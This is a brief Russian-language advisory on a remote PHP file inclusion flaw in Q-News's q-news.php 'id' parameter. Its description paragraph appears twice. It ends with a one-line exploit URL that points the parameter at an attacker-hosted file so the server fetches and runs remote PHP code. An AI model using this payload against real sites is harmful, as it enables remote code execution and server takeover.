PHP инклюдинг в Q-News
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Уязвимость обнаружена при обработке входных данных в параметре "id" сценария "q-news.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Сплойт:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Уязвимость обнаружена при обработке входных данных в параметре "id" сценария "q-news.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Сплойт:
Код:
http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]